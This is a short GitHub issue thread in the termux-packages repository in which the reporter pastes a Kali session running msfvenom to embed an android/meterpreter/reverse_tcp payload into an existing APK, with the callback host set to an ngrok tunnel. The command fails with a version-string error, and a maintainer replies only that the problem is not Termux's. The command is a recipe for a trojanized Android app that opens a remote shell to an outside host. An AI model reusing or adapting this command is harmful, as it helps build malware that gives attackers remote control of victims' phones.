### ISSUE TITLE
Malformed version number string 2.4.0

### ISSUE THREAD

**Issue by RyzexRyuk** [termux/termux-packages#5148]
root@kali:~/Desktop/Blot# msfvenom -x fpb.apk  -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19549 -o fpp.apk
Using APK template: fpb.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

**Comment by Grimler91** [comment]
This does not look like a termux problem.
